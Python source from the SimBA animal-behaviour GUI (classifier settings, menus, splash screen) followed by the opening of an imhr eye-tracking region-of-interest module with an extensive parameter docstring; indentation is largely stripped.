self.getshapscores = 'no'
self.shappresent = self.shap_present.entry_get
self.shapabsent = self.shap_absent.entry_get
def save_new(self):
self.get_checkbox()
meta_number = 0
for f in os.listdir(os.path.join(os.path.dirname(self.configini), 'configs')):
if f.__contains__('_meta') and f.__contains__(str(self.varmodel.get())):
meta_number += 1
# for s in self.settings:
# meta_df[s.lblName.cget('text')] = [s.entry_get]
new_meta_dict = {'RF_n_estimators': self.label_nestimators.entry_get,
'RF_max_features': self.label_maxfeatures.entry_get, 'RF_criterion': self.label_criterion.entry_get,
'train_test_size': self.label_testsize.entry_get, 'RF_min_sample_leaf': self.label_minsampleleaf.entry_get,
'under_sample_ratio': self.label_under_s_correctionvalue.entry_get, 'under_sample_setting': self.label_under_s_settings.entry_get,
'over_sample_ratio': self.label_over_s_ratio.entry_get, 'over_sample_setting': self.label_over_s_settings.entry_get,
'generate_rf_model_meta_data_file': self.rfmetadata,
'generate_example_decision_tree': self.generate_example_d_tree,'generate_classification_report':self.generate_classification_report,
'generate_features_importance_log': self.generate_features_imp_log,'generate_features_importance_bar_graph':self.generate_features_bar_graph,
'n_feature_importance_bars': self.n_importance,'compute_feature_permutation_importance':self.compute_permutation_imp,
'generate_sklearn_learning_curves': self.generate_learning_c,
'generate_precision_recall_curves':self.generate_precision_recall_c, 'learning_curve_k_splits':self.learningcurveksplit,
'learning_curve_data_splits': self.learningcurvedatasplit,
'generate_shap_scores':self.getshapscores,
'shap_target_present_no':self.shappresent,
                         'shap_target_absent_no': self.shapabsent}
meta_df = pd.DataFrame(new_meta_dict, index=[0])
meta_df.insert(0, 'Classifier_name', str(self.varmodel.get()))
        output_path = os.path.join(os.path.dirname(self.configini), 'configs', str(self.varmodel.get()) + '_meta_' + str(meta_number) + '.csv')
print(os.path.basename(str(output_path)),'saved')
        meta_df.to_csv(output_path, index=False)
def set_values(self):
self.get_checkbox()
#### settings
model = self.var.get()
n_estimators = self.label_nestimators.entry_get
max_features = self.label_maxfeatures.entry_get
criterion = self.label_criterion.entry_get
test_size = self.label_testsize.entry_get
min_sample_leaf = self.label_minsampleleaf.entry_get
under_s_c_v = self.label_under_s_correctionvalue.entry_get
under_s_settings = self.label_under_s_settings.entry_get
over_s_ratio = self.label_over_s_ratio.entry_get
over_s_settings = self.label_over_s_settings.entry_get
classifier_settings = self.varmodel.get()
#export settings to config ini file
configini = self.configini
config = ConfigParser()
config.read(configini)
config.set('create ensemble settings', 'model_to_run', str(model))
config.set('create ensemble settings', 'RF_n_estimators', str(n_estimators))
config.set('create ensemble settings', 'RF_max_features', str(max_features))
config.set('create ensemble settings', 'RF_criterion', str(criterion))
config.set('create ensemble settings', 'train_test_size', str(test_size))
config.set('create ensemble settings', 'RF_min_sample_leaf', str(min_sample_leaf))
config.set('create ensemble settings', 'under_sample_ratio', str(under_s_c_v))
config.set('create ensemble settings', 'under_sample_setting', str(under_s_settings))
config.set('create ensemble settings', 'over_sample_ratio', str(over_s_ratio))
config.set('create ensemble settings', 'over_sample_setting', str(over_s_settings))
config.set('create ensemble settings', 'classifier',str(classifier_settings))
config.set('create ensemble settings', 'RF_meta_data', str(self.rfmetadata))
config.set('create ensemble settings', 'generate_example_decision_tree', str(self.generate_example_d_tree))
config.set('create ensemble settings', 'generate_classification_report', str(self.generate_classification_report))
config.set('create ensemble settings', 'generate_features_importance_log', str(self.generate_features_imp_log))
config.set('create ensemble settings', 'generate_features_importance_bar_graph', str(self.generate_features_bar_graph))
config.set('create ensemble settings', 'N_feature_importance_bars', str(self.n_importance))
config.set('create ensemble settings', 'compute_permutation_importance', str(self.compute_permutation_imp))
config.set('create ensemble settings', 'generate_learning_curve', str(self.generate_learning_c))
config.set('create ensemble settings', 'generate_precision_recall_curve', str(self.generate_precision_recall_c))
config.set('create ensemble settings', 'LearningCurve_shuffle_k_splits',str(self.learningcurveksplit))
config.set('create ensemble settings', 'LearningCurve_shuffle_data_splits',str(self.learningcurvedatasplit))
config.set('create ensemble settings', 'generate_example_decision_tree_fancy',str(self.generate_example_decision_tree_fancy))
config.set('create ensemble settings', 'generate_shap_scores',str(self.getshapscores))
config.set('create ensemble settings', 'shap_target_present_no', str(self.shappresent))
config.set('create ensemble settings', 'shap_target_absent_no', str(self.shapabsent))
with open(configini, 'w') as configfile:
config.write(configfile)
print('Settings exported to project_config.ini')
class makelineplot:
def __init__(self):
# Popup window
lpToplevel = Toplevel()
lpToplevel.minsize(200, 200)
lpToplevel.wm_title("Make line plot")
lpLabelframe = LabelFrame(lpToplevel)
lpvideo = FileSelect(lpLabelframe,'Video',lblwidth='10')
lpcsv = FileSelect(lpLabelframe,'csv file',lblwidth='10')
bpentry = Entry_Box(lpLabelframe,'Bodypart','10')
lpbutton = Button(lpLabelframe,text='Generate plot',command =lambda: draw_line_plot_tools(lpvideo.file_path,lpcsv.file_path,bpentry.entry_get))
#organize
lpLabelframe.grid(row=0,sticky=W)
lpvideo.grid(row=0,sticky=W)
lpcsv.grid(row=1,sticky=W)
bpentry.grid(row=2,sticky=W)
lpbutton.grid(row=3,pady=10)
class runmachinemodelsettings:
def __init__(self,inifile):
self.row1 = []
self.row2 = []
self.row3 = []
self.row4 = []
self.targetname = []
# Popup window
runmms = Toplevel()
runmms.minsize(200, 200)
runmms.wm_title("Select model to run")
### read inifile and get the model
config = ConfigParser()
configini = str(inifile)
config.read(configini)
no_targets = config.get('SML settings','no_targets')
###get all target from ini
for i in range(int(no_targets)):
currentModelNames = 'target_name_' + str(i+1)
currentModelNames = config.get('SML settings', currentModelNames)
self.targetname.append(currentModelNames)
###loop for table
table = LabelFrame(runmms)
#set title
tn = Label(table,text='Classifier',font=("Helvetica",10,'bold'))
tn.grid(row=0,column=0,sticky=W,pady=5)
selectmodel = Label(table,text='Model path (.sav)',font=("Helvetica",10,'bold'))
selectmodel.grid(row=0,column=1)
thresholdtitle = Label(table,text='Threshold',font=("Helvetica",10,'bold') )
thresholdtitle.grid(row=0,column=2,sticky=W)
minbouttitle = Label(table,text='Minimum Bout',font=("Helvetica",10,'bold'))
minbouttitle.grid(row=0,column=3,sticky=W)
# main loop for content of table
for i in range(len(self.targetname)):
self.row1.append(Label(table,text=str(self.targetname[i])))
self.row1[i].grid(row=i+2,column=0,sticky=W)
self.row2.append(FileSelect(table,title='Select model (.sav) file'))
self.row2[i].grid(row=i+2,column=1,sticky=W)
self.row3.append(Entry(table))
self.row3[i].grid(row=i+2,column=2,sticky=W,padx=5)
self.row4.append(Entry(table))
self.row4[i].grid(row=i+2,column=3,sticky=W,padx=5)
button_set = Button(runmms,text='Set model(s)',command =lambda:self.set_modelpath_to_ini(inifile),font=("Helvetica",10,'bold'),fg='red')
table.grid(row=0,sticky=W,pady=5,padx=5)
button_set.grid(row=1,pady=10)
def set_modelpath_to_ini(self,inifile):
config = ConfigParser()
configini = str(inifile)
config.read(configini)
for i in range(len(self.targetname)):
config.set('SML settings','model_path_'+(str(i+1)),str(self.row2[i].file_path))
config.set('threshold_settings', 'threshold_' + (str(i + 1)), str(self.row3[i].get()))
config.set('Minimum_bout_lengths', 'min_bout_' + (str(i + 1)), str(self.row4[i].get()))
with open(configini, 'w') as configfile:
config.write(configfile)
print('Model paths saved in project_config.ini')
def get_frame(self):
'''
Return the "frame" useful to place inner controls.
'''
return self.canvas
class ToolTip(object):
def __init__(self, widget):
self.widget = widget
self.tipwindow = None
self.id = None
self.x = self.y = 0
def showtip(self, text):
"Display text in tooltip window"
self.text = text
if self.tipwindow or not self.text:
return
x, y, cx, cy = self.widget.bbox("insert")
x = x + self.widget.winfo_rootx() + 57
y = y + cy + self.widget.winfo_rooty() +27
self.tipwindow = tw = Toplevel(self.widget)
tw.wm_overrideredirect(1)
tw.wm_geometry("+%d+%d" % (x, y))
label = Label(tw, text=self.text, justify=LEFT,
background="#ffffe0", relief=SOLID, borderwidth=1,
font=("tahoma", "8", "normal"))
label.pack(ipadx=1)
def hidetip(self):
tw = self.tipwindow
self.tipwindow = None
if tw:
tw.destroy()
def CreateToolTip(widget, text):
toolTip = ToolTip(widget)
def enter(event):
toolTip.showtip(text)
def leave(event):
toolTip.hidetip()
widget.bind('<Enter>', enter)
widget.bind('<Leave>', leave)
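# Usage sketch for CreateToolTip (hypothetical widget names, not from the original code):
#   btn = Button(root, text='Run')
#   CreateToolTip(btn, 'Starts the analysis')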
def form_validator_is_numeric(inStr, acttyp):
if acttyp == '1': #insert
if not inStr.isdigit():
return False
return True
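# Usage sketch (assumed Tk validation wiring; '%P' is the proposed text and '%d' the action type,
# where '1' means insert, matching the check above):
#   vcmd = (root.register(form_validator_is_numeric), '%P', '%d')
#   entry = Entry(root, validate='key', validatecommand=vcmd)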
class aboutgui:
def __init__(self):
about = Toplevel()
about.minsize(657, 398)
about.wm_title("About")
canvas = Canvas(about,width=657,height=398,bg='black')
canvas.pack()
scriptdir = os.path.dirname(__file__)
img = PhotoImage(file=os.path.join(scriptdir,'TheGoldenLab_aboutme.png'))
canvas.create_image(0,0,image=img,anchor='nw')
canvas.image = img
class App(object):
def __init__(self):
scriptdir = os.path.dirname(os.path.realpath(__file__))
self.root = Tk()
self.root.title('SimBA')
self.root.minsize(750,750)
self.root.geometry("750x750")
self.root.rowconfigure(0, weight=1)
self.root.columnconfigure(0, weight=1)
if currentPlatform == 'Windows':
self.root.iconbitmap(os.path.join(scriptdir,'SimBA_logo.ico'))
img = PhotoImage(file=os.path.join(scriptdir,'golden.png'))
background = Label(self.root, image=img, bd=0)
background.pack(fill='both', expand=True)
background.image = img
### drop down menu###f
menu = Menu(self.root)
self.root.config(menu=menu)
#first menu
fileMenu = Menu(menu)
menu.add_cascade(label='File', menu=fileMenu)
fileMenu.add_command(label='Create a new project',command=project_config)
fileMenu.add_command(label='Load project', command=lambda:loadprojectMenu(loadprojectini))
fileMenu.add_separator()
fileMenu.add_command(label='Exit', command=Exit)
# Process video
pvMenu = Menu(menu)
menu.add_cascade(label='Process Videos', menu=pvMenu)
pvMenu.add_command(label='Batch pre-process videos', command=batch_processvideo)
#third menu
thirdMenu = Menu(menu)
menu.add_cascade(label='Tracking',menu=thirdMenu)
#dlc
dlcmenu = Menu(thirdMenu)
dlcmenu.add_command(label='Create DLC Model',command=create_project_DLC)
dlcmenu.add_command(label='Load DLC Model',command=Load_DLC_Model)
#deepPoseKit
dpkmenu = Menu(thirdMenu)
dpkmenu.add_command(label='Create DeepPoseKit project', command=createDPK_project)
dpkmenu.add_command(label='Load DeepPoseKit project', command=lambda:loadprojectMenu(deepPoseKitMenu))
#labelling tool
labellingtoolmenu = Menu(thirdMenu)
labellingtoolmenu.add_command(label='labelImg', command=lambda: subprocess.call(["labelImg"]))
labellingtoolmenu.add_command(label='labelme', command=lambda: subprocess.call(["labelme"]))
#third menu organize
thirdMenu.add_cascade(label='DeepLabCut', menu=dlcmenu)
thirdMenu.add_cascade(label='DeepPoseKit', menu=dpkmenu)
thirdMenu.add_command(label='LEAP', command=lambda: print('coming soon'))
thirdMenu.add_cascade(label='Labelling tools', menu=labellingtoolmenu)
#fifth menu
fifthMenu = Menu(menu)
#changefpsmenu
fpsMenu = Menu(fifthMenu)
fpsMenu.add_command(label='Change fps for single video', command=changefps)
fpsMenu.add_command(label='Change fps for multiple videos',command=changefpsmulti)
menu.add_cascade(label='Tools',menu=fifthMenu)
fifthMenu.add_command(label='Clip videos',command=shorten_video)
fifthMenu.add_command(label='Clip video into multiple videos', command=multi_shorten_video)
fifthMenu.add_command(label='Crop videos',command=crop_video)
fifthMenu.add_command(label='Multi-crop',command=multicropmenu)
fifthMenu.add_command(label='Downsample videos',command=video_downsample)
fifthMenu.add_command(label='Get mm/ppx',command = get_coordinates_from_video)
fifthMenu.add_command(label='Make line plot', command=makelineplot)
fifthMenu.add_cascade(label='Change fps...',menu =fpsMenu)
#changefpsmenu organize
changeformatMenu = Menu(fifthMenu)
changeformatMenu.add_command(label='Change image file formats',command=change_imageformat)
changeformatMenu.add_command(label='Change video file formats',command=convert_video)
changeformatMenu.add_command(label='Change .seq to .mp4', command=lambda:convertseqVideo(askdirectory(title='Please select video folder to convert')))
fifthMenu.add_cascade(label='Change formats...',menu=changeformatMenu)
fifthMenu.add_command(label='CLAHE enhance video',command=Red_light_Convertion)
fifthMenu.add_command(label='Superimpose frame numbers on video',command=lambda:superimposeframe(askopenfilename()))
fifthMenu.add_command(label='Convert to grayscale',command=lambda:greyscale(askopenfilename()))
fifthMenu.add_command(label='Merge frames to video',command=mergeframeffmpeg)
fifthMenu.add_command(label='Generate gifs', command=creategif)
extractframesMenu = Menu(fifthMenu)
extractframesMenu.add_command(label='Extract defined frames',command=extract_specificframes)
extractframesMenu.add_command(label='Extract frames',command=extract_allframes)
extractframesMenu.add_command(label='Extract frames from seq files', command=extract_seqframe)
fifthMenu.add_cascade(label='Extract frames...',menu=extractframesMenu)
convertWftypeMenu = Menu(fifthMenu)
convertWftypeMenu.add_command(label='Convert CSV to parquet', command=CSV2parquet)
        convertWftypeMenu.add_command(label='Convert parquet to CSV', command=parquet2CSV)
fifthMenu.add_cascade(label='Convert working file type...', menu=convertWftypeMenu)
#sixth menu
sixthMenu = Menu(menu)
menu.add_cascade(label='Help',menu=sixthMenu)
#labelling tool
links = Menu(sixthMenu)
links.add_command(label='Download weights',command = lambda:webbrowser.open_new(str(r'https://osf.io/sr3ck/')))
links.add_command(label='Download classifiers', command=lambda: webbrowser.open_new(str(r'https://osf.io/kwge8/')))
links.add_command(label='Ex. feature list',command=lambda: webbrowser.open_new(str(r'https://github.com/sgoldenlab/simba/blob/master/misc/Feature_description.csv')))
links.add_command(label='SimBA github', command=lambda: webbrowser.open_new(str(r'https://github.com/sgoldenlab/simba')))
links.add_command(label='Gitter Chatroom', command=lambda: webbrowser.open_new(str(r'https://gitter.im/SimBA-Resource/community')))
links.add_command(label='Install FFmpeg',command =lambda: webbrowser.open_new(str(r'https://m.wikihow.com/Install-FFmpeg-on-Windows')))
links.add_command(label='Install graphviz', command=lambda: webbrowser.open_new(str(r'https://bobswift.atlassian.net/wiki/spaces/GVIZ/pages/20971549/How+to+install+Graphviz+software')))
sixthMenu.add_cascade(label="Links",menu=links)
sixthMenu.add_command(label='About', command= aboutgui)
#Status bar at the bottom
self.frame = Frame(background, bd=2, relief=SUNKEN, width=300, height=300)
self.frame.pack(expand=True)
self.txt = Text(self.frame, bg='white')
self.txt.config(state=DISABLED)
self.txt.pack(expand=True, fill='both')
sys.stdout = StdRedirector(self.txt)
# writes text out in GUI
class StdRedirector(object):
def __init__(self, text_widget):
self.text_space = text_widget
def write(self, string):
self.text_space.config(state=NORMAL)
self.text_space.insert("end", string)
self.text_space.update()
self.text_space.see("end")
self.text_space.config(state=DISABLED)
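# StdRedirector instances replace sys.stdout (see App above), so print() output from the
# analysis functions appears in the GUI text box instead of the console.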
class SplashScreen:
def __init__(self, parent):
self.parent = parent
self.Splash()
self.Window()
def Splash(self):
scriptdir = os.path.dirname(__file__)
if currentPlatform == 'Windows':
self.image = Image.open(os.path.join(scriptdir,"TheGoldenLab.png"))
if (currentPlatform == 'Linux') or (currentPlatform == 'Darwin'):
self.image = Image.open(os.path.join(scriptdir, "TheGoldenLab.PNG"))
self.imgSplash = ImageTk.PhotoImage(self.image)
def Window(self):
width, height = self.image.size
halfwidth = (self.parent.winfo_screenwidth()-width)//2
halfheight = (self.parent.winfo_screenheight()-height)//2
self.parent.geometry("%ix%i+%i+%i" %(width, height, halfwidth,halfheight))
Label(self.parent, image=self.imgSplash).pack()
def terminate_children(children):
for process in children:
process.terminate()
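# terminate_children is registered with atexit in open_plotly_interface so the dash-app and
# browser subprocesses are cleaned up when SimBA exits.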
def main():
#windows icon
if currentPlatform == 'Windows':
import ctypes
myappid = 'SimBA development wheel' # arbitrary string
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
root = Tk()
root.overrideredirect(True)
# import tkinter.font as TkFont
# default_font = TkFont.nametofont("TkDefaultFont")
# default_font.configure(size=6)
# root.option_add("*Font", default_font)
app = SplashScreen(root)
root.after(2000, root.destroy)
root.mainloop()
app = App()
print('Welcome fellow scientists :)' + '\n')
print('\n')
app.root.mainloop()
|
_roi.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
| `@purpose`: Generate regions of interest that can be used for data processing and analysis.
| `@date`: Created on Sat May 1 15:12:38 2019
| `@author`: Semeon Risom
| `@email`: semeon.risom@gmail.com
| `@url`: https://semeon.io/d/imhr
"""
# allowed imports
__all__ = ['ROI']
# required external libraries
__required__ = ['opencv-python','psd-tools','matplotlib','Pillow']
# local
from .. import settings
# check if psd_tools and cv2 is available
try:
# required for init
from pdb import set_trace as breakpoint
import os
from pathlib import Path
import pandas as pd
import numpy as np
import random
# plot
from PIL import Image, ImageOps
import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.patches as patches
# import photoshop
import psd_tools
# math
import cv2
except ImportError as e:
pkg = e.name
x = {'cv2':'opencv-python', 'psd_tools':'psd-tools'}
pkg = x[pkg] if pkg in x else pkg
raise Exception("No module named '%s'. Please install from PyPI before continuing."%(pkg),'red')
class ROI():
"""Generate regions of interest that can be used for data processing and analysis."""
@classmethod
def __init__(self, isMultiprocessing=False, detection='manual', image_path=None, output_path=None, metadata_source=None,
roi_format='both', shape='box', roicolumn='roi', uuid=None, filetype='psd', **kwargs):
"""Generate regions of interest that can be used for data processing and analysis.
Parameters
----------
isMultiprocessing : :obj:`bool`
Should the rois be generated using multiprocessing. Default is **False**.
detection : :obj:`str` {'manual', 'haarcascade'}
How should the regions of interest be detected. Either manually (**manual**), through the use of highlighting layers in photo-editing
software, or automatically through feature detection using **haarcascade** classifiers from opencv. Default is **manual**.
image_path : :obj:`str`
Image directory path.
output_path : :class:`str`
Path to save data.
roi_format : :obj:`str` {'raw', 'dataviewer', 'both'}
Format to export ROIs. Either to 'csv' (**raw**) or to Eyelink DataViewer 'ias' (**dataviewer**) or both (**both**).
Default is **both**. Note: If **roi_format** = **dataviewer**, **shape** must be either be **circle**, **rotated**, or **straight**.
metadata_source : :class:`str` or :obj:`None` {'path', 'embedded'}
Metadata source. If metadata is being read from a spreadsheet, **metadata_source** should be the path to
the metadata file; if metadata is embedded within the image as a layer name, **metadata_source** = **embedded**.
Default is **embedded**. For example:
>>> # if metadata is in PSD images
>>> metadata = 'embedded'
>>> # if metadata is an external xlsx file.
>>> metadata = 'roi/metadata.xlsx'
Although Photoshop PSD files don't directly support metadata, if each region of interest is stored
as a separate layer within a PSD, the layer name can be used to store metadata. To do this, the layer name has
to be written as delimited text; our code reads this text and extracts the relevant metadata. The delimiter can
be either **;** **,** **|** **\\t** or **\\s** (the delimiter type must be identified when running this code using the
**delimiter** parameter; the default is **;**). Here's an example using **;** as a delimiter:
.. rst-class:: code-param-whitespace
>>> imagename = "BM001"; roiname = 1; feature = "lefteye"
Note: whitespace should be avoided in each layer name, as it may cause errors during parsing.
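For instance, a delimited layer name can be split into a metadata dict (illustrative sketch only, not part of the API):
.. rst-class:: code-param-whitespace
>>> layer = 'imagename = "BM001"; roiname = 1; feature = "lefteye"'
>>> {k.strip(): v.strip().strip('"') for k, v in (item.split('=') for item in layer.split(';'))}
{'imagename': 'BM001', 'roiname': '1', 'feature': 'lefteye'}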
shape : :obj:`str` {'polygon', 'hull', 'circle', 'rotated', 'straight'}
Shape of machine readable boundaries for region of interest. Default is **straight**. **polygon** creates a Contour
Approximation and will most closely match the original shape of the roi. **hull** creates a Convex Hull, which
is similar to but not as complex as a Contour Approximation and will include bulges for areas that are convex.
**circle** creates a minimum enclosing circle. Finally, both **rotated** and **straight** create a Bounding Rectangle,
with the only difference being compensation for the minimum enclosing area for the box when using **rotated**.
roicolumn : :obj:`str`
The name of the label for the region of interest in your metadata. For example you may want to extract the column
'feature' from your metadata and use this as the label. Default is **roi**.
uuid : :obj:`list` or :obj:`None`
Create a unique id by combining a list of existing variables in the metadata. This is recommended
if **roi_format** == **dataviewer** because of the limited variables allowed for ias files. Default is **None**.
filetype: :obj:`str` {'psd', 'tiff', 'dcm', 'png', 'bmp', 'jpg'}
The filetype extension of the image file. Case insensitive. Default is **psd**. If **psd**, **tiff**, or **dcm** (DICOM),
the file can be read as multilayered.
**kwargs : :obj:`str` or :obj:`None`, optional
Additional properties to control how data is exported, naming variables, exporting images are also available:
These properties control additional core parameters for the API:
.. list-table::
:class: kwargs
:widths: 25 50
:header-rows: 1
* - Property
- Description
* - **cores** : :obj:`int` or :obj:`str`
- (if **isMultiprocessing** == **True**) Number of cores to use, or **max**. Default is **max** (total available cores - 1).
* - **isLibrary** : :obj:`bool`
- Check if required packages have been installed. Default is **False**.
* - **isDebug** : :obj:`bool`
- Allow flags to be visible. Default is **False**.
* - **isDemo** : :obj:`bool`
- Tests code with in-house images and metadata. Default is **False**.
* - **save_data** : :obj:`bool`
- Save coordinates. Default is **True**.
* - **newcolumn** : :obj:`dict` {:obj:`str`, :obj:`str`} or :obj:`False`
- Add an additional column to the metadata. This must be a dict of the form {key: value}. Default is **False**.
* - **save_raw_image** : :obj:`bool`
- Save raw images. Default is **True**.
* - **append_output_name** : :obj:`bool` or :obj:`str`
- Add appending name to all exported files (i.e. <'top_center'> IMG001_top_center.ias). Default is **False**.
* - **save_contour_image** : :obj:`bool`
- Save generated contours as images. Default is **True**.
* - **scale** : :obj:`int`
- If image is scaled during presentation, set scale. Default is **1**.
* - **offset** : :obj:`list` [:obj:`int`]
- Center point of image, relative to screensize. Default is **[960, 540]**.
* - **screensize** : :obj:`list` [:obj:`int`]
- Monitor size used during presentation. Default is **[1920, 1080]**.
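For example, a minimal sketch of these display-related keyword arguments (values are illustrative only):
.. rst-class:: code-param-whitespace
>>> # stimuli shown at twice their native size, centered on a 1080p monitor
>>> kwargs = dict(scale=2, offset=[960, 540], screensize=[1920, 1080])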
These properties control how data is processed, including the type of haarcascade used and the delimiter for metadata:
.. list-table::
:class: kwargs
:widths: 25 50
:header-rows: 1
* - Property
- Description
* - **delimiter** : :obj:`str` {';' , ',' , '|' , 'tab' , 'space'}
- (if **filetype** == **psd**) How the metadata is delimited within each layer name. Default is **;**.
* - **classifiers** : :obj:`str` {'default'} or :obj:`dict`
- (if **detection** == **haarcascade**) Trained classifiers to use. Default is {'eye_tree_eyeglasses', 'eye', 'frontalface_alt_tree', 'frontalface_alt', 'frontalface_alt2','frontalface_default', 'fullbody', 'lowerbody', 'profileface', 'smile', 'upperbody'}. Parameters are stored `here <imhr.eyetracking.ROI.haar_parameters>`__. If you want to use custom classifiers, you can pass a dictionary of classifiers (keyed by name) and their arguments using the following format:
.. rst-class:: code-param-whitespace
.. code-block:: python
>>> {'custom_cascade': {
... 'type': 'eye',
... 'path': './haarcascade_eye.xml',
... 'minNeighbors': 5,
... 'minSize': (100,100),
... 'scaleFactor': 1.01,
... 'thickness': 2 }
... }
You can also pass custom arguments by calling them after initiation:
.. rst-class:: code-param-whitespace
.. code-block:: python
>>> roi = imhr.eyetracking.ROI(detection='haarcascade', ...)
>>> roi.classifiers['eye']['minNeighbors'] = 10
Here are properties specific to how images are exported after processing. The code can either use :class:`matplotlib` or :class:`PIL` as a backend engine:
.. list-table::
:class: kwargs
:widths: 25 50
:header-rows: 1
* - Property
- Description
* - **image_backend** : :class:`str` {'matplotlib', 'PIL'}
- Backend for exporting image. Either :class:`matplotlib` or :class:`PIL`. Default is :class:`matplotlib`.
* - **rcParams** : :class:`dict` or :obj:`None`
- A dictionary of rc parameter names and values, passed to :class:`matplotlib.rcParams` (within which validation functions are defined and associated with each rc parameter). Default is **None**.
* - **background_color** : :class:`list`
- Set background color (RGB) for exporting images. Default is **[110, 110, 110]**.
* - **dpi** : :class:`int` or :obj:`None`
- (if **save_image** == **True**) Quality of exported images, refers to 'dots per inch'. Default is **300**.
* - **remove_axis** : :class:`bool`
- Remove axis from :obj:`matplotlib.pyplot`. Default is **False**.
* - **tight_layout** : :class:`bool`
- Remove whitespace from :obj:`matplotlib.pyplot`. Default is **False**.
* - **set_size_inches** : :class:`bool`
- Set size of :obj:`matplotlib.pyplot` according to screensize of ROI. Default is **False**.
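For example, a sketch of the image-export keyword arguments (values are illustrative only):
.. rst-class:: code-param-whitespace
>>> # export with matplotlib at 300 dpi on a grey background, without axes
>>> kwargs = dict(image_backend='matplotlib', dpi=300, background_color=[110, 110, 110], remove_axis=True)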
Attributes
----------
shape_d : :class:`str` {'ELLIPSE', 'FREEHAND', 'RECTANGLE'}
DataViewer ROI shape.
psd : `psd_tools.PSDImage <https://psd-tools.readthedocs.io/en/latest/reference/psd_tools.html#psd_tools.PSDImage>`__
Photoshop PSD/PSB file object. The file should include one layer for each region of interest.
retval, threshold : :obj:`numpy.ndarray`
Returns from :ref:`cv2.threshold`. The function applies a fixed-level thresholding to a multiple-channel array.
**retval** provides an optimal threshold only if :ref:`cv2.THRESH_OTSU` is passed. **threshold** is an image after applying
a binary threshold (:ref:`cv2.THRESH_BINARY`) removing all greyscale pixels < 127. The output matches the same image
channel as the original image.
See `opencv <https://docs.opencv.org/4.0.1/d7/d1b/group__imgproc__misc.html#gae8a4a146d1ca78c626a53577199e9c57>`__ and
`learnopencv <https://www.learnopencv.com/opencv-threshold-python-cpp>`__ for more information.
contours, hierarchy : :obj:`numpy.ndarray`
Returns from :ref:`cv2.findContours`. This function returns contours from the provided binary image (threshold).
This is used here for later shape detection. **contours** are the detected contours, while **hierarchy** contains
information about the image topology.
See `opencv <https://docs.opencv.org/4.0.1/d3/dc0/group__imgproc__shape.html#gadf1ad6a0b82947fa1fe3c3d497f260e07>`__
for more information.
image_contours : :obj:`numpy.ndarray`
Returns from :ref:`cv2.drawContours`. This draws filled contours from the image.
Raises
------
Exception
If **shape** is **polygon** or **hull** while **roi_format** == **dataviewer**.
Exception
If **image_path** is invalid, contains no images of the requested **filetype**, or the metadata file is empty.
Examples
--------
.. code-block:: python
>>> from imhr.roi import ROI
>>> s = "/dist/example/raw/"; d="/dist/example/"
>>> ROI(image_path=s, output_path=d, shape='straight')
.. code-block:: python
>>> img.save('/Users/mdl-admin/Desktop/roi/PIL.png') #DEBUG: save PIL
>>> cv2.imwrite('/Users/mdl-admin/Desktop/roi/cv2.png', img_cv2) #DEBUG: save cv2
>>> plt.imshow(img_np); plt.savefig('/Users/mdl-admin/Desktop/roi/matplotlib.png') #DEBUG: save matplotlib
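A fuller call using the keyword arguments described above (a sketch; paths and values are illustrative only):
.. code-block:: python
>>> from imhr.roi import ROI
>>> s = "/dist/example/raw/"; d = "/dist/example/"
>>> ROI(isMultiprocessing=False, detection='manual', image_path=s, output_path=d,
... metadata_source='embedded', roi_format='both', shape='straight', uuid=['image','roi'], isDebug=True)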
Notes
-----
Resources
* Guide
* https://docs.opencv.org/master/d4/d73/tutorial_py_contours_begin.html
* Details
* For more information about each shape:
* See https://docs.opencv.org/master/dd/d49/tutorial_py_contour_features.html
* For more information how images are drawn:
* See https://docs.opencv.org/2.4/modules/core/doc/drawing_functions.html
* To understand how bounds are created:
* See https://docs.opencv.org/2.4/modules/imgproc/doc/structural_analysis_and_shape_descriptors.html
"""
import imhr
self.path = Path(imhr.__file__).parent
# get console and time
self.console = settings.console
self.now = settings.time
# check debug
self.isDebug = kwargs['isDebug'] if 'isDebug' in kwargs else False
# check library
self.isLibrary = kwargs['isLibrary'] if 'isLibrary' in kwargs else False
if self.isLibrary:
settings.library(__required__)
#----parameters
self.detection = detection
# demo
self.isDemo = kwargs['isDemo'] if 'isDemo' in kwargs else False
# multiprocessing
self.isMultiprocessing = isMultiprocessing
self.cores = kwargs['cores'] if 'cores' in kwargs else 'max'
# how to read data
self.metadata_source = kwargs['metadata_source'] if 'metadata_source' in kwargs else 'embedded'
# how to format rois
self.roi_format = roi_format
# delimiter
self.delimiter = kwargs['delimiter'] if 'delimiter' in kwargs else ';'
# screensize
self.screensize = kwargs['screensize'] if 'screensize' in kwargs else [1920, 1080]
# scale
self.scale = kwargs['scale'] if 'scale' in kwargs else 1
# offset image coordinates
cx = self.screensize[0]/2
cy = self.screensize[1]/2
self.recenter = kwargs['recenter'] if 'recenter' in kwargs else [cx, cy]
if self.recenter != [cx, cy]:
self.newoffset = True
else:
self.newoffset = False
# shape
self.shape = shape if shape in ['polygon', 'hull', 'circle', 'rotated', 'straight'] else 'straight'
self.shape_d = None #dataviewer shape
# uuid
self.uuid = uuid
# label
self.roicolumn = roicolumn
# add column
self.newcolumn = kwargs['newcolumn'] if 'newcolumn' in kwargs else None
# add appendix to name
self.append_output_name = kwargs['append_output_name'] if 'append_output_name' in kwargs else False
# save
self.save = {}
# save csv
self.save['data'] = kwargs['save_data'] if 'save_data' in kwargs else True
# save contour images
self.save['contours'] = kwargs['save_contour_image'] if 'save_contour_image' in kwargs else True
# save raw images
self.save['raw'] = kwargs['save_raw_image'] if 'save_raw_image' in kwargs else True
#-----PIL
self.background_color = kwargs['background_color'] if 'background_color' in kwargs else (110, 110, 110)
#-----matplotlib
self.image_backend = kwargs['image_backend'] if 'image_backend' in kwargs else 'matplotlib'
# hide/show
self.remove_axis = kwargs['remove_axis'] if 'remove_axis' in kwargs else False
self.tight_layout = kwargs['tight_layout'] if 'tight_layout' in kwargs else False
self.set_size_inches = kwargs['set_size_inches'] if 'set_size_inches' in kwargs else False
if self.remove_axis: plt.rcParams.update({'axes.titlesize':0, 'axes.labelsize':0, 'xtick.labelsize':0,
'ytick.labelsize':0, 'savefig.pad_inches':0, 'font.size': 0})
# sizes
self.dpi = kwargs['dpi'] if 'dpi' in kwargs else 300
self.axis_tick_fontsize = kwargs['axis_tick_fontsize'] if 'axis_tick_fontsize' in kwargs else 8
self.axis_title_fontsize = kwargs['axis_title_fontsize'] if 'axis_title_fontsize' in kwargs else 10
